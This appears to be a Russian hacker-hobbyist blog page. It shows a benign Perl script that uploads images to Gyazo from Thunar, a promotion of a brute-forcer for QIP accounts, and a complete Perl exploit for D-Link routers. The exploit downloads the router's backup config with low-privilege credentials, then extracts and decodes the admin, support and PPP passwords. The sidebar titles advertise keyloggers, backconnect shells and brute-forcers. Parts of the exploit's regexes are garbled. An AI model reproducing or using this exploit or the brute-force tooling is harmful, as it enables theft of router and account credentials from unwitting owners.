Linux

Сегодня я решил написать ещё одну заметку связанную с Thunar.
А именно, мой скрипт с помощью которого можно загружать изображения на хостинг изображений в пару кликов.
Как добавить этот скрипт в контекстное меню файлового менеджера, вы можете прочесть в заметке «Плюшки в контекстном меню Thunar«.
И так, для работы скрипта нужно создать директорию, я создал скритую директорию «/home/%USERNAME%/.tools/gyazo/load_img».
После этого нужно в директорию /home/%USERNAME%/.tools/gyazo/, положить файл который можно взять здесь: http://zalil.ru/32685907 .

А в директорию «/home/%USERNAME%/.tools/gyazo/load_img» нужно положить файл start.pl.
И забить вот таким текстом:

#!/usr/bin/perl -w

use lib '/home/%USERNAME%/.tools/gyazo/';
use Gyazo;
use strict;

my $proxy = undef;
my $time = time();
my $image = shift or warn 'You don\'t push image!'."\n" and exit;

if ($proxy) {
if (Gyazo::set_proxy($proxy)) {
print '[Proxy] -> ['.$proxy."]\n";
} else {
print 'Cent set PROXY'."\n";
exit;
}
}

if (Gyazo::set_id($time)) {
print '[ID] -> ['.$time."]\n";
} else {
print 'Cent set ID'."\n";
exit;
}

my $link = Gyazo::img_up($image);

if ($link) {
print "Image loaded ok!\n";
system('notify-send "Screen" "'.$link.'"');

system("echo \"$link\"|xclip -selection clipboard -i");

} else {
print "Image loaded ERROR!\n";
system('notify-send "Screen" "ERROR!"');
}

И дать этому скрипту права на исполнение.
В меню добавляем команду «/home/shok/.tools/gyazo/load_img/start.pl %f», и радуемся =)
Должны быть предустановлены утилиты notify-send, xclip.
Юзайте на здоровье.

tt twitter big4 Загрузка картинок на Gyazo, прямо из Thunar tt digg big4 Загрузка картинок на Gyazo, прямо из Thunar tt facebook big4 Загрузка картинок на Gyazo, прямо из Thunar tt gmail big4 Загрузка картинок на Gyazo, прямо из Thunar tt myspace big4 Загрузка картинок на Gyazo, прямо из Thunar tt reddit big4 Загрузка картинок на Gyazo, прямо из Thunar

c50ae11ac4626b22190f2e26cd5deab6 Плюшки в контекстном меню Thunar

Предисловие.

С недавнего времени мне стало довольно часто нужно склеевать текстовые файлы, а так же удалять из этих файлов дубликаты.
Я долгое время делал всё из терминала, но когда юзаешь менеджер файлов, то это не удобно постоянно открывать терминал в нужной папке, и делать пару тех же самых команд.
А если что то делать лень — то тут есть место для автоматизации:D
Я использую файловый менеджер thunar, потому опишу как добаить пункты именно в его меню.
Прочитать остальную часть записи »

tt twitter big4 Плюшки в контекстном меню Thunar tt digg big4 Плюшки в контекстном меню Thunar tt facebook big4 Плюшки в контекстном меню Thunar tt gmail big4 Плюшки в контекстном меню Thunar tt myspace big4 Плюшки в контекстном меню Thunar tt reddit big4 Плюшки в контекстном меню Thunar

На днях, я увидел брут для аккаунтов QIP, брутфорс написан под Windows, его автор _Alien_.
d1486651d15f Cкрипты для взлома аккаунтов QIP

Этот брут поддержевает:
d2a1f3c391fb Cкрипты для взлома аккаунтов QIPМногопоточность
d2a1f3c391fb Cкрипты для взлома аккаунтов QIPПоддержка HTTP,
d2a1f3c391fb Cкрипты для взлома аккаунтов QIPSocks4, Socks5 прокси
d2a1f3c391fb Cкрипты для взлома аккаунтов QIPПоддержка работы без прокси(максимум 1-2 потока)
d2a1f3c391fb Cкрипты для взлома аккаунтов QIPВозможность брута всех поддоменов qip`a
Прочитать остальную часть записи »

tt twitter big4 Cкрипты для взлома аккаунтов QIP tt digg big4 Cкрипты для взлома аккаунтов QIP tt facebook big4 Cкрипты для взлома аккаунтов QIP tt gmail big4 Cкрипты для взлома аккаунтов QIP tt myspace big4 Cкрипты для взлома аккаунтов QIP tt reddit big4 Cкрипты для взлома аккаунтов QIP

Эксплойт юзает багу, которая позволяет слить сонфиг файл из под учётки юзера, и от туда достать нужную инфу, на пример такую как пасс админа.
За мой инглишь сильно не пинать icon smile Dlink exploit
В сплойт заложил ещё пару полезных мелочей, таких как возможность слить все акки с роутера и слить настройки всех соединений.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
#!/usr/bin/perl -w

###
use strict;
use LWP::UserAgent;
use MIME::Base64;
use Getopt::Std;
###

help() if (scalar(@ARGV) == 0);

my %opt=();
getopt("lpat",\%opt);

help() if ($opt{h});

DEF:

my $adress = $opt{a} || '192.168.1.1';
my $login = $opt{l} || 'user';
my $pass = $opt{p} || 'user';
$opt{t} = 1 unless ($opt{t});

my $session = encode_base64($login.':'.$pass);

my $ua = LWP::UserAgent->new;
$ua->agent('Exploit agent 1.0.0');

my $conf = $ua->get('http://'.$adress.'/backupsettings.conf', 'Authorization' => 'Basic '.$session)->content;

if ($opt{t} == 1) {
    print "Printing xml file:\n". '==' x 20 ."\n".$conf."\n". '==' x 20 ."\n";
}

if ($opt{t} == 2) {
    my ($syspass) = ($conf) =~ m##;
    my ($sptpass) = ($conf) =~ m##;
    my ($usrpass) = ($conf) =~ m##;
   
    $syspass = decode_base64($syspass);
    $sptpass = decode_base64($sptpass);
    $usrpass = decode_base64($usrpass);
   
    print "admin:".$syspass."\nsupport:".$sptpass."\nuser:".$usrpass."\n";
}

if ($opt{t} == 3) {
    my (@id) = ($conf) =~ m#
    my (@name) = ($conf) =~ m#
    my (@pass) = ($conf) =~ m#
    print "Cet information form ppp connections:\n". '==' x 30 ."\n";
    while (1) {
        my $id = shift @id or last;
        print "ID:".$id."\n";
        my $name = shift @name or last;
        print "Login:".$name."\n";
        my $pass = shift @pass or last;
        $pass = decode_base64($pass);
        print "Pass:".$pass."\n";
    }
    print  '==' x 30 ."\n";
}

if ($opt{t} == 4) {
        open(F, '> backupsettings.conf');
    print F $conf."\n";
    close(F);
}


sub help {
    print "
###################################################
### DLink router exploit            ###
### Author: SHok aka mr. Lex        ###
### Official site: http://nig.org.ua/   ###
### Licens: GPL v3              ###
###################################################

-h - this help message
-l - user login
-p - user pass
-a - server adres
-t tipe atak [1, 2, 3, 4]

1 - get xml config file
2 - get all accaunts
3 - get all ppp connection information
4 - save xml config from hard disc

"
;exit;
}

tt twitter big4 Dlink exploit tt digg big4 Dlink exploit tt facebook big4 Dlink exploit tt gmail big4 Dlink exploit tt myspace big4 Dlink exploit tt reddit big4 Dlink exploit

RSS-подписка NIG Twitter-подписка NIG

Метки
Друзья
Блог линуксоида Программы для диагностики компьютера
Супер Pixel
Убивалка флешаБэкконект шелл. Часть вторая.Бэкконект шелл. Начало.НАМ для деления чиселПростая арифметикаПередача файлов. Часть третья. Клиент.Dll injectionСканер портовКодировка текста в BMPРухнул на два дняПередача файлов. Часть вторая. Сервер.Поворот и BMPCRC32 суммаBMP форматфайловые вирусыассемблер, строкиАссемблер и матрицапримеры ассемблерМногопоточное программированиеАрхитектура клиент — серверРаздача ICQПишем шуткупишем паукаПривет от ДжеймсаОбход firewallЗагрузка картинок на Gyazo, прямо из ThunarКейлоггер 3Плюшки в контекстном меню Thunarc по сетиКейлоггер 2КейлоггерСкачать Ассемблер!VirusCheckerОтморозки мешают жить ?! Не проблемма !Cкрипты для взлома аккаунтов QIPWinAPI. Работа с файлами. Часть третья. ЧтениеDlink exploitБрут сайта etxt.ruКрасивая раскладка клавиатуры в GnomeМои безделушки на PerlКак запускать Perl скрипты под WindowsБрутфорс партнёрки ZipCoinПарсер upwap.ruИзменения в блогеЧудо ЗаливалкаСкрипт для загрузки файлов на Zalil.ruЯндекс «чоткий» поисковик!WinAPI. Работа с файлами. Часть вторая. ЗаписьWinAPI. Работа с файлами. Часть первая. ПоискПолучение MD5 хеша средствами C++Что нам стоить letitfile.com забрутить?WarCraft III запуск под LinuxЭнтропия файлаWinsock и C++. Мини прокси. Часть |\\/. Завершающая.Перепилил чекер для 4gameЧекер акаунтов YoupornCMailSend v 1.1. Отправка почы без проблемСлучайные числаWinsock и C++. Часть |||. smtp монстр.Брутфорс LetitFile.comИспользование X-Forwarded-For, для обмана веб-сервера, подмена IP подручными средствамиДело было вечером, делать было нечего…Мысли о аудио сервереПарсер ников из твиттераКонец школоло…Perl+Linux. Заметка первая (Удобный Paste bin).Бэкконект шелл.E-MAIL + winsocket + Cpp. Сложно?winsock и C++. Часть ||. Атака клоунов.C++ резолвинг адресаPerl, анализ HTML кода и определение CMSМатематика в C++winsock и C++